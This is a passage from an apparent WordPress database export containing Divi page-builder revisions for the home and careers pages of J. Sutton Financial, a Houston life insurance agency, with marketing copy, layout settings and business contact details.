_module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2>Want to know how much insurance you need?</h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:45:51','2023-04-02 19:45:51','',138,'http://cmdev-site1.com/?p=645',0,'revision','',0),(644,1,'2023-04-02 19:44:06','2023-04-02 19:44:06','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\"]<h2>Want to know how much insurance you need?</h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect _builder_version=\"4.20.2\" _module_preset=\"default\" typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" typing_text_color=\"#FFFFFF\" header_level=\"h2\" header_text_align=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"54px|||||\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:44:06','2023-04-02 19:44:06','',138,'http://cmdev-site1.com/?p=644',0,'revision','',0),(646,1,'2023-04-02 19:58:33','2023-04-02 19:58:33','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Careers\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" 